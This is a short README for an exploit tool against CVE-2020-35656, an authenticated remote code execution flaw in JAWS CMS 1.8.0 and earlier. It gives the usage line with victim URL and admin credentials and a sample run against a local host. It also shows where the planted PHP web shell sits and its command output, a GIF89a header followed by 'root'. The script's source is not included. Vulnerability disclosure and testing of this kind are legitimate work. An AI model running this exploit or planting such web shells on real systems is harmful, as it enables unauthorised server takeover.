Jaws-CMS-RCE CVE-2020-35656
Authenticated RCE JAWS CMS <=1.8.0
python jaws-rce.py [+]Usage python jaws-rce.py http://victim.com/ admin admin
python jaws-rce.py http://192.168.1.98/jaws-master/jaws-master/ jawsadmin admin
Shell Location=== http://192.168.1.98/jaws-master/jaws-master/data/files/cmd47.php?c=whoami
GIF89a
root
Discoverer
Bassam Assiri https://twitter.com/BassamAssiri https://www.linkedin.com/in/bassam-assiri-9418401ab/
Special Thanks to:
Abdallah Fouad https://twitter.com/AbdallafouadX https://www.linkedin.com/in/abdallah-fouad/